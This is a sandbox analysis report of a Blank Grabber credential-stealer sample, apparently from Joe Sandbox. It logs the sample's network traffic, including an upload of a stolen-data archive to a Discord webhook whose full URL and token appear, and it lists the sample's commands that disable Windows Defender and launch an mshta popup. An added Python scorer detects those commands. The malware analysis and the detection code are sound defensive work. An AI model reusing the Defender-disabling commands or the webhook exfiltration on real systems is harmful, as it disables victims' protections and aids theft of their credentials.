                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697756052 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697827101 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697839975 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698076963 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698091984 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698379993 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698393106 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698592901 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698606014 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698821068 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698832989 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699057102 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699069023 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699296951 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699316978 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699517012 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699527979 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699776888 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699796915 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700007915 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700021982 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700261116 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700272083 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700757980 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700768948 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700786114 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700795889 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700932026 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700943947 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701153040 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701165915 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701406002 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701417923 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701658964 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701673031 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701891899 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702115059 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702367067 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702591896 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702847004 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706135035 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706475973 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706502914 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706892967 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706914902 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707137108 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707149982 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707541943 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707554102 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707873106 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708081961 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708343983 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708734035 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708956957 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.710988998 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711337090 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711361885 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711627007 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711651087 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713449001 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713474035 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713792086 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713807106 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.714076996 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.714791059 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.715158939 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.715532064 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.715655088 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.716702938 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.356528044 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.356610060 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.356712103 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.357451916 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.376818895 CET5000680192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.381851912 CET8050006208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.381910086 CET5000680192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 07:19:22.469485044 CET | 50018 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 07:19:22.478086948 CET | 53 | 50018 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 07:19:25.390865088 CET | 49227 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 07:19:25.397901058 CET | 53 | 49227 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 07:19:58.401062012 CET | 61730 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 07:19:58.408387899 CET | 53 | 61730 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 07:19:59.196995974 CET | 64116 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 07:19:59.203511953 CET | 53 | 64116 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 07:19:22.469485044 CET | 192.168.2.4 | 1.1.1.1 | 0xae70 | Standard query (0) | blank-whj1o.in | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:25.390865088 CET | 192.168.2.4 | 1.1.1.1 | 0x71d2 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:58.401062012 CET | 192.168.2.4 | 1.1.1.1 | 0x2fbf | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:59.196995974 CET | 192.168.2.4 | 1.1.1.1 | 0x1192 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 07:18:16.266263008 CET | 1.1.1.1 | 192.168.2.4 | 0xe12c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:18:16.266263008 CET | 1.1.1.1 | 192.168.2.4 | 0xe12c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:22.478086948 CET | 1.1.1.1 | 192.168.2.4 | 0xae70 | Name error (3) | blank-whj1o.in | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:25.397901058 CET | 1.1.1.1 | 192.168.2.4 | 0x71d2 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:58.408387899 CET | 1.1.1.1 | 192.168.2.4 | 0x2fbf | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:59.203511953 CET | 1.1.1.1 | 192.168.2.4 | 0x1192 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:59.203511953 CET | 1.1.1.1 | 192.168.2.4 | 0x1192 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:59.203511953 CET | 1.1.1.1 | 192.168.2.4 | 0x1192 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:59.203511953 CET | 1.1.1.1 | 192.168.2.4 | 0x1192 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 07:19:59.203511953 CET | 1.1.1.1 | 192.168.2.4 | 0x1192 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49904 | 208.95.112.1 | 80 | 7732 | C:\Users\user\Desktop\KpHYfxnJs6.exe
Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 07:19:25.406873941 CET | 117 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0
Jan 5, 2025 07:19:25.866300106 CET | 175 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 06:19:25 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 49
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 50006 | 208.95.112.1 | 80 | 7732 | C:\Users\user\Desktop\KpHYfxnJs6.exe
Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 07:19:58.416261911 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0
Jan 5, 2025 07:19:58.889084101 CET | 381 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 06:19:58 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 16
X-Rl: 41
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 50007 | 162.159.137.232 | 443 | 7732 | C:\Users\user\Desktop\KpHYfxnJs6.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 06:19:59 UTC | 302 | OUT | POST /api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPDaio_xou6MvVt3E_xErz6c HTTP/1.1
Host: discord.com
Accept-Encoding: identity
Content-Length: 757556
User-Agent: python-urllib3/2.3.0
Content-Type: multipart/form-data; boundary=be021ac6dd6a6f9463cea33afec2e4d4
2025-01-05 06:19:59 UTC | 16384 | OUT | Data Raw: 2d 2d 62 65 30 32 31 61 63 36 64 64 36 61 36 66 39 34 36 33 63 65 61 33 33 61 66 65 63 32 65 34 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 b7 77 77 f4 21 04 00 00 01 0f 9c 4a dd f3 43 32 35 39 a9 c3 a5 b7 7b cd 87 5c c2 99 19 9e 87 8a b1 a7 43 b7 d7 c3 82 e2 58 4b ca bc d7 02 18 5d 44 06 5f 07 65 c5 5d 26 2f e5 06 3d 3f 9a ba 51 fa 34 7f 95 83 8b 7c 79 6d 14 07 38 27 38 de 7f 7b 34 b7 b9 8b 5c 9c 0f 13 1b 3d 23 c7 ca 5b d5
Data Ascii: --be021ac6dd6a6f9463cea33afec2e4d4Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!ww!JC259{\CXK]D_e]&/=?Q4|ym8'8{4\=#[
2025-01-05 06:20:00 UTC | 1257 | IN | HTTP/1.1 404 Not Found
Date: Sun, 05 Jan 2025 06:20:00 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1736058001
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zw5vSBldi9iOW%2B9eohdvopcKIAWFYHRKodKbFFkuEUzy6NjtAeQYt%2BV0q9gfoFdO%2F3nGXOF%2BcBDredMg2V2D2z5kQySEIm6wi2C5gtsOEXVdIv4eJe8aFfj1Uo95"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Set-Cookie: __cfruid=5cbfc4dd6375ebbad0e3f09fa787817f5ba62106-1736058000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                              Set-Cookie: _cfuvid=bS8fx30a016BJMMg6M7LZNH.avt_AGjRctIj0yxJamY-1736058000314-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8fd15c226cc4429d-EWR



                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:01:17:58
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\KpHYfxnJs6.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:9'081'534 bytes
                                                                                                                                                                                                                              MD5 hash:41B147FD16A94A8EA6164177CF91733C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                              Start time:01:18:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\KpHYfxnJs6.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:9'081'534 bytes
                                                                                                                                                                                                                              MD5 hash:41B147FD16A94A8EA6164177CF91733C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true
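
The command lines of Target IDs 5, 6 and 8 above are the Defender-tampering and mshta-popup chain a detection engineer would want to catch in process-creation telemetry (Sysmon Event ID 1 or Security 4688). The following scorer is an added example and is not code from the Joe Sandbox report or from the Blank Grabber sample: it runs a small rule set over command lines and sums weights. The rule names, weights, alert threshold and Finding structure are assumptions of this example; the indicator patterns come from the three command lines listed above, and the two benign lines at the end of the sample input are constructed so the scorer has something it must not flag.

```python
"""Score process-creation command lines for the Defender tampering and
mshta popup seen in the process list above.

Added example, not code from the Joe Sandbox report or the Blank Grabber
sample.  Rule names, weights, the alert threshold and the Finding structure
are assumptions of this example; the indicator patterns are taken from the
command lines of Target IDs 5, 6 and 8.
"""
import re
from dataclasses import dataclass, field


def regex(pattern: str):
    """Build a case-insensitive predicate over a full command line."""
    compiled = re.compile(pattern, re.I)
    return lambda cmdline: compiled.search(cmdline) is not None


def disabled_feature_count(cmdline: str) -> int:
    """Count '-Disable<Feature> $true' switches as passed to Set-MpPreference."""
    return len(re.findall(r"-Disable\w+\s+\$true", cmdline, re.I))


# (rule name, predicate, weight) -- weights are illustrative, not tuned.
RULES = [
    ("defender_exclusion_added",
     regex(r"Add-MpPreference\b.*-ExclusionPath\b"), 30),
    # An exclusion under a user-writable path is the real tell: a dropper
    # whitelisting itself, which an administrator rarely has reason to do.
    ("defender_exclusion_in_user_writable_path",
     regex(r"-ExclusionPath\s+['\"]?(?:C:\\Users\\|%TEMP%|%APPDATA%|%USERPROFILE%)"), 30),
    ("defender_realtime_disabled",
     regex(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true"), 50),
    ("defender_many_features_disabled",
     lambda c: disabled_feature_count(c) >= 3, 30),
    ("defender_cloud_reporting_disabled",
     regex(r"-MAPSReporting\s+Disabled|-SubmitSamplesConsent\s+(?:NeverSend|2)\b"), 20),
    ("defender_definitions_removed",
     regex(r"MpCmdRun\.exe\"?\s+-RemoveDefinitions\s+-All\b"), 50),
    ("mshta_inline_javascript",
     regex(r"\bmshta(?:\.exe)?\s+\"?javascript:"), 40),
]


@dataclass
class Finding:
    cmdline: str
    rules: list = field(default_factory=list)
    score: int = 0


def analyze(cmdline: str) -> Finding:
    """Apply every rule to one command line and sum the weights that fire."""
    finding = Finding(cmdline=cmdline)
    for name, predicate, weight in RULES:
        if predicate(cmdline):
            finding.rules.append(name)
            finding.score += weight
    return finding


def analyze_all(cmdlines, threshold: int = 40):
    """Return only the findings at or above the alert threshold."""
    return [f for f in map(analyze, cmdlines) if f.score >= threshold]


# Sample input: the three command lines copied from Target IDs 5, 6 and 8
# above, plus two constructed benign administrative lines that must not alert.
SAMPLE_CMDLINES = [
    r'''C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"''',
    r'''C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"''',
    r'''C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""''',
    r"powershell Get-MpPreference",                     # constructed, benign
    r"powershell Set-MpPreference -ScanScheduleDay 1",  # constructed, benign
]

if __name__ == "__main__":
    for finding in analyze_all(SAMPLE_CMDLINES):
        print(f"score={finding.score:<4} rules={','.join(finding.rules)}")
        print(f"    {finding.cmdline[:100]}")
```

The weighting keeps a lone `Add-MpPreference -ExclusionPath` below the threshold, since administrators do add exclusions, and lets the user-writable path rule push it over; the Target ID 6 line fires four rules at once, which is the combination worth an immediate alert rather than any single switch.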

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
